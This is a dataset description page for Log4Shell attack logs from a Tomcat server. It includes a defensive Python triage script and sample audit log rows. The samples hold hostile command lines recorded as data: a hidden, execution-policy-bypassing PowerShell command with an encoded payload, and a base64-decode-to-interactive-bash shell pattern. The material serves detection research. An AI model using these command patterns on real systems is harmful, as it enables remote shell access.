| Property | Value |
| --- | --- |
| Network Data Source | pcaps |
| Network Data Labeled | No, seems to be implied |
| Host Data Source | Sysmon for Linux |
| Host Data Labeled | No, seems to be implied |
| Overall Setting | Single OS |
| OS Types | Ubuntu 18.04.6 LTS |
| Number of Machines | 1 (+ Attacker) |
| Total Runtime | n/a |
| Year of Collection | 2021 |
| Attack Categories | Log4j / Log4Shell |
| Benign Activity | None |
| Packed Size | <1 MB |
| Unpacked Size | 1 MB |
| Download Link | goto |
Overview
This is a subset of the Security Datasets Collection focusing on an exploit scenario featuring the Log4j vulnerability.
Environment
A machine (“UBUNTU5”) running Ubuntu 18.04.6 LTS is configured as the victim, hosting Apache Tomcat together with vulnerable versions of Java libraries (see linked setup below). Information about the attacking machine seems to be hidden in various sub-folders, if it is present at all.
Activity
The attacker exploits CVE-2021-44228 and obtains a shell. Further steps are not detailed, and no simulated benign activity is present either.
Contained Data
Logs come in the form of Sysmon events (generated by Sysmon for Linux) and packet captures, though some of the logs definitely originate from a Windows machine (they contain Windows-style paths, mention PowerShell execution, NT AUTHORITY accounts, etc.). Their origin is not documented, and labeling information is not provided in general either.
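Added example (not code from the dataset or its authors): a Python triage pass over rows of the shape shown in the Data Examples, which sorts each JSON row by origin using its Type and SourceSystem fields (so misplaced Windows rows are found regardless of folder), parses the auoms key=value payload of the Linux rows, and flags the web-server-to-shell chain on both platforms. The sample rows are constructed from the field layout on this page; the rule names, the shell list and the assumption that each export holds one JSON object per line are mine.

```python
import json
import re
from collections import defaultdict

# Constructed sample rows (not taken from the dataset), reduced to the keys read below but
# shaped like the SecurityEvent (Windows) and Syslog/auoms (Linux) rows shown on this page.
TOMCAT_WIN = "C:\\ProgramData\\chocolatey\\lib\\Tomcat\\tools\\apache-tomcat-9.0.62\\bin\\tomcat9.exe"
PSH_WIN = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
JVM = "/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java"
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/bash"}
AUOMS_KV = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def _win_row(event_id, parent, child, cmdline):
    """One constructed SecurityEvent row carrying the flattened 4688 fields used below."""
    return json.dumps({"Type": "SecurityEvent", "SourceSystem": "OpsManager", "Computer": "WORKSTATION5",
                       "EventID": event_id, "ParentProcessName": parent, "NewProcessName": child,
                       "CommandLine": cmdline})


def _linux_row(pid, ppid, success, comm, exe, name, tail):
    """One constructed auoms Syslog row in the key=value layout of the Linux rows on this page."""
    msg = (f"type=AUOMS_EXECVE audit(1652292621.990:{pid}): syscall=execve success={success} "
           f'ppid={ppid} pid={pid} user=tomcat uid=1001 comm="{comm}" exe="{exe}" '
           f'name="{name}" {tail} redactors= containerid=')
    return json.dumps({"Type": "Syslog", "SourceSystem": "Linux", "Computer": "UBUNTU5",
                       "EventType": "AUOMS_EXECVE", "SyslogMessage": msg})


SAMPLE_LINES = [
    _win_row(4688, TOMCAT_WIN, PSH_WIN, "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc QUJD"),
    _win_row(4688, PSH_WIN, "C:\\Windows\\System32\\conhost.exe",
             "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    # The JVM worker's PATH search: execve("bash") fails (exit=-2) until /bin/bash is found;
    # those failed attempts still carry the pre-exec image (java) and the worker thread name.
    _linux_row(17790, 1340, "no", "http-nio-8080-e", JVM, "/usr/local/sbin/bash",
               f"exit=-2 proctitle={JVM} -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties"),
    _linux_row(17790, 1340, "yes", "bash", "/bin/bash", "/bin/bash",
               'exit=0 argc=3 cmdline="bash -c "{echo,QUJD}|{base64,-d}|{bash,-i}""'),
    _linux_row(17793, 17790, "yes", "base64", "/usr/bin/base64", "/usr/bin/base64",
               'exit=0 argc=2 cmdline="base64 -d"'),
    _linux_row(17794, 17790, "yes", "bash", "/bin/bash", "/bin/bash", 'exit=0 argc=2 cmdline="bash -i"'),
]


def parse_auoms(message):
    """Split an auoms key=value line. A value runs to the next ' key=' boundary, which copes
    with the unescaped nested quotes auoms writes in cmdline and the '=' inside proctitle."""
    fields = {}
    for key, val in AUOMS_KV.findall(message):
        if len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]  # drop exactly one layer of quoting
        fields[key] = val
    return fields


def origin(rec):
    """Windows rows are SecurityEvent tables, Linux rows are Syslog tables fed by auoms."""
    if rec.get("Type") == "SecurityEvent":
        return "windows"
    if rec.get("Type") == "Syslog" and rec.get("SourceSystem") == "Linux":
        return "linux"
    return "unknown"


def _base(win_path):
    return win_path.rsplit("\\", 1)[-1].lower()


def triage(lines):
    """Count rows per origin and flag the web-server-to-shell chain on each platform."""
    counts, findings = defaultdict(int), []
    pre_exec = {}                 # pid -> (exe, comm) seen on failed execve attempts
    children = defaultdict(list)  # ppid -> [(pid, cmdline)] of successful execs
    for line in lines:
        rec = json.loads(line)
        where = origin(rec)
        counts[where] += 1
        if where == "windows" and rec.get("EventID") == 4688:
            cmd = rec.get("CommandLine", "")
            if (_base(rec.get("ParentProcessName", "")) == "tomcat9.exe"
                    and _base(rec.get("NewProcessName", "")) in {"powershell.exe", "cmd.exe"}):
                enc = any(t.lower() in {"-e", "-ec", "-enc", "-encodedcommand"} for t in cmd.split())
                findings.append({"host": rec["Computer"], "rule": "tomcat spawned shell",
                                 "encoded": enc, "detail": cmd})
        elif where == "linux" and rec.get("EventType") == "AUOMS_EXECVE":
            f = parse_auoms(rec["SyslogMessage"])
            if f.get("success") != "yes":
                pre_exec.setdefault(f["pid"], (f.get("exe", ""), f.get("comm", "")))
                continue
            children[f["ppid"]].append((f["pid"], f.get("cmdline", f.get("exe", ""))))
            exe, comm = pre_exec.get(f["pid"], ("", ""))
            if f.get("exe") in SHELLS and exe.endswith("/java") and comm.startswith("http-nio"):
                findings.append({"host": rec["Computer"], "rule": "JVM worker executed shell",
                                 "pid": f["pid"], "user": f.get("user"), "detail": f.get("cmdline", "")})
    for fd in findings:           # attach what a flagged Linux shell went on to run
        if "pid" in fd:
            fd["children"] = [c for _, c in sorted(children[fd["pid"]])]
    return {"counts": dict(counts), "findings": findings}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

On the real exports, feed the script the lines of each .json file; the origin counts alone show which "Linux" folders actually hold Windows SecurityEvent rows.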
Links
Data Examples
Snippet of Windows Sysmon logs taken from securityauditing_log4shell_cve2021_44228_java_serialized_object_2022-05-13045400.json.
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-18\u003c/Data\u003e\r\n \u003cData Name=\"SubjectUserName\"\u003eWORKSTATION5$\u003c/Data\u003e\r\n \u003cData Name=\"SubjectDomainName\"\u003eWORKGROUP\u003c/Data\u003e\r\n \u003cData Name=\"SubjectLogonId\"\u003e0x3e7\u003c/Data\u003e\r\n \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u003c/Data\u003e\r\n \u003cData Name=\"HandleId\"\u003e0x844\u003c/Data\u003e\r\n \u003cData Name=\"TransactionId\"\u003e{00000000-0000-0000-0000-000000000000}\u003c/Data\u003e\r\n \u003cData Name=\"AccessList\"\u003e%%1538 \t\t\t\t%%4432 \t\t\t\t%%4435 \t\t\t\t%%4436 \t\t\t\t\u003c/Data\u003e\r\n \u003cData Name=\"AccessReason\"\u003e-\u003c/Data\u003e\r\n \u003cData Name=\"AccessMask\"\u003e0x20019\u003c/Data\u003e\r\n \u003cData Name=\"PrivilegeList\"\u003e-\u003c/Data\u003e\r\n \u003cData Name=\"RestrictedSidCount\"\u003e0\u003c/Data\u003e\r\n \u003cData Name=\"ProcessId\"\u003e0x1e24\u003c/Data\u003e\r\n \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4656,"Activity":"4656 - A handle to an object was requested.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Account":"WORKGROUP\\WORKSTATION5$","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-18\u003c/Data\u003e\r\n \u003cData Name=\"SubjectUserName\"\u003eWORKSTATION5$\u003c/Data\u003e\r\n \u003cData Name=\"SubjectDomainName\"\u003eWORKGROUP\u003c/Data\u003e\r\n \u003cData Name=\"SubjectLogonId\"\u003e0x3e7\u003c/Data\u003e\r\n \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u003c/Data\u003e\r\n \u003cData Name=\"HandleId\"\u003e0x844\u003c/Data\u003e\r\n \u003cData Name=\"AccessList\"\u003e%%4432 \t\t\t\t\u003c/Data\u003e\r\n \u003cData Name=\"AccessMask\"\u003e0x1\u003c/Data\u003e\r\n \u003cData Name=\"ProcessId\"\u003e0x1e24\u003c/Data\u003e\r\n \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4663,"Activity":"4663 - An attempt was made to access an object.","AccessList":"%%4432 \t\t\t\t","AccessMask":"0x1","HandleId":"0x844","ObjectName":"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","ObjectServer":"Security","ObjectType":"Key","Process":"powershell.exe","ProcessId":"0x1e24","ProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SubjectAccount":"WORKGROUP\\WORKSTATION5$","SubjectDomainName":"WORKGROUP","SubjectLogonId":"0x3e7","SubjectUserName":"WORKSTATION5$","SubjectUserSid":"S-1-5-18","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n \u003cData Name=\"ProcessId\"\u003e3936\u003c/Data\u003e\r\n \u003cData Name=\"Application\"\u003e\\device\\harddiskvolume2\\programdata\\chocolatey\\lib\\tomcat\\tools\\apache-tomcat-9.0.62\\bin\\tomcat9.exe\u003c/Data\u003e\r\n \u003cData Name=\"SourceAddress\"\u003e::\u003c/Data\u003e\r\n \u003cData Name=\"SourcePort\"\u003e54225\u003c/Data\u003e\r\n \u003cData Name=\"Protocol\"\u003e6\u003c/Data\u003e\r\n \u003cData Name=\"FilterRTID\"\u003e0\u003c/Data\u003e\r\n \u003cData Name=\"LayerName\"\u003e%%14608\u003c/Data\u003e\r\n \u003cData Name=\"LayerRTID\"\u003e38\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":5158,"Activity":"5158 - The Windows Filtering Platform has permitted a bind to a local port.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:07.507Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n \u003cData Name=\"ProcessID\"\u003e3936\u003c/Data\u003e\r\n \u003cData Name=\"Application\"\u003e\\device\\harddiskvolume2\\programdata\\chocolatey\\lib\\tomcat\\tools\\apache-tomcat-9.0.62\\bin\\tomcat9.exe\u003c/Data\u003e\r\n \u003cData Name=\"Direction\"\u003e%%14593\u003c/Data\u003e\r\n \u003cData Name=\"SourceAddress\"\u003e192.168.2.5\u003c/Data\u003e\r\n \u003cData Name=\"SourcePort\"\u003e54225\u003c/Data\u003e\r\n \u003cData Name=\"DestAddress\"\u003e192.168.3.5\u003c/Data\u003e\r\n \u003cData Name=\"DestPort\"\u003e1389\u003c/Data\u003e\r\n \u003cData Name=\"Protocol\"\u003e6\u003c/Data\u003e\r\n \u003cData Name=\"FilterRTID\"\u003e69359\u003c/Data\u003e\r\n \u003cData Name=\"LayerName\"\u003e%%14611\u003c/Data\u003e\r\n \u003cData Name=\"LayerRTID\"\u003e48\u003c/Data\u003e\r\n \u003cData Name=\"RemoteUserID\"\u003eS-1-0-0\u003c/Data\u003e\r\n \u003cData Name=\"RemoteMachineID\"\u003eS-1-0-0\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":5156,"Activity":"5156 - The Windows Filtering Platform has allowed a connection.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.42Z","SourceSystem":"OpsManager","Account":"NT AUTHORITY\\LOCAL SERVICE","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventID":4688,"Activity":"4688 - A new process has been created.","CommandLine":"powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc 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","MandatoryLabel":"S-1-16-16384","NewProcessId":"0x824","NewProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessName":"C:\\ProgramData\\chocolatey\\lib\\Tomcat\\tools\\apache-tomcat-9.0.62\\bin\\tomcat9.exe","Process":"powershell.exe","ProcessId":"0xf60","SubjectAccount":"NT AUTHORITY\\LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","SubjectUserName":"LOCAL SERVICE","SubjectUserSid":"S-1-5-19","TargetAccount":"-\\-","TargetDomainName":"-","TargetLogonId":"0x0","TargetUserName":"-","TargetUserSid":"S-1-0-0","TokenElevationType":"%%1936","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.713Z","SourceSystem":"OpsManager","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-19\u003c/Data\u003e\r\n \u003cData Name=\"SubjectUserName\"\u003eLOCAL SERVICE\u003c/Data\u003e\r\n \u003cData Name=\"SubjectDomainName\"\u003eNT AUTHORITY\u003c/Data\u003e\r\n \u003cData Name=\"SubjectLogonId\"\u003e0x3e5\u003c/Data\u003e\r\n \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\u003c/Data\u003e\r\n \u003cData Name=\"HandleId\"\u003e0x260\u003c/Data\u003e\r\n \u003cData Name=\"TransactionId\"\u003e{00000000-0000-0000-0000-000000000000}\u003c/Data\u003e\r\n \u003cData Name=\"AccessList\"\u003e%%4432 \t\t\t\t\u003c/Data\u003e\r\n \u003cData Name=\"AccessReason\"\u003e-\u003c/Data\u003e\r\n \u003cData Name=\"AccessMask\"\u003e0x1\u003c/Data\u003e\r\n \u003cData Name=\"PrivilegeList\"\u003e-\u003c/Data\u003e\r\n \u003cData Name=\"RestrictedSidCount\"\u003e0\u003c/Data\u003e\r\n \u003cData Name=\"ProcessId\"\u003e0x824\u003c/Data\u003e\r\n \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4656,"Activity":"4656 - A handle to an object was requested.","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.713Z","SourceSystem":"OpsManager","Account":"NT AUTHORITY\\LOCAL SERVICE","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventID":4688,"Activity":"4688 - A new process has been created.","CommandLine":"\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1","MandatoryLabel":"S-1-16-16384","NewProcessId":"0x2e04","NewProcessName":"C:\\Windows\\System32\\conhost.exe","ParentProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Process":"conhost.exe","ProcessId":"0x824","SubjectAccount":"NT AUTHORITY\\LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","SubjectUserName":"LOCAL SERVICE","SubjectUserSid":"S-1-5-19","TargetAccount":"-\\-","TargetDomainName":"-","TargetLogonId":"0x0","TargetUserName":"-","TargetUserSid":"S-1-0-0","TokenElevationType":"%%1936","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
{"TenantId":"redacted","TimeGenerated":"2022-05-13T08:54:08.713Z","SourceSystem":"OpsManager","Account":"NT AUTHORITY\\LOCAL SERVICE","AccountType":"Machine","Computer":"WORKSTATION5","EventSourceName":"Microsoft-Windows-Security-Auditing","Channel":"Security","Task":1,"Level":"0","EventData":"\u003cEventData xmlns=\"http://schemas.microsoft.com/win/2004/08/events/event\"\u003e\r\n \u003cData Name=\"SubjectUserSid\"\u003eS-1-5-19\u003c/Data\u003e\r\n \u003cData Name=\"SubjectUserName\"\u003eLOCAL SERVICE\u003c/Data\u003e\r\n \u003cData Name=\"SubjectDomainName\"\u003eNT AUTHORITY\u003c/Data\u003e\r\n \u003cData Name=\"SubjectLogonId\"\u003e0x3e5\u003c/Data\u003e\r\n \u003cData Name=\"ObjectServer\"\u003eSecurity\u003c/Data\u003e\r\n \u003cData Name=\"ObjectType\"\u003eKey\u003c/Data\u003e\r\n \u003cData Name=\"ObjectName\"\u003e\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\u003c/Data\u003e\r\n \u003cData Name=\"HandleId\"\u003e0x260\u003c/Data\u003e\r\n \u003cData Name=\"AccessList\"\u003e%%4432 \t\t\t\t\u003c/Data\u003e\r\n \u003cData Name=\"AccessMask\"\u003e0x1\u003c/Data\u003e\r\n \u003cData Name=\"ProcessId\"\u003e0x824\u003c/Data\u003e\r\n \u003cData Name=\"ProcessName\"\u003eC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u003c/Data\u003e\r\n \u003cData Name=\"ResourceAttributes\"\u003e-\u003c/Data\u003e\r\n\u003c/EventData\u003e","EventID":4663,"Activity":"4663 - An attempt was made to access an object.","AccessList":"%%4432 \t\t\t\t","AccessMask":"0x1","HandleId":"0x260","ObjectName":"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa","ObjectServer":"Security","ObjectType":"Key","Process":"powershell.exe","ProcessId":"0x824","ProcessName":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","SubjectAccount":"NT AUTHORITY\\LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","SubjectUserName":"LOCAL SERVICE","SubjectUserSid":"S-1-5-19","SourceComputerId":"29acc230-2f13-49db-9ef2-c9b20229a10d","EventOriginId":"29acc230-2f13-49db-9ef2-c9b20229a10c","MG":"00000000-0000-0000-0000-000000000001","TimeCollected":"2022-05-13T08:54:38.145Z","ManagementGroupName":"AOI-redacted","Type":"SecurityEvent","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/workstation5"}
Snippet of Linux Sysmon logs taken from syslog_auoms_auditd_log4shell_cve2021_44228_jndi_reference_2022-05-11181020.json.
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:21.997Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84138): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:21.997Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84139): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/local/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/local/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
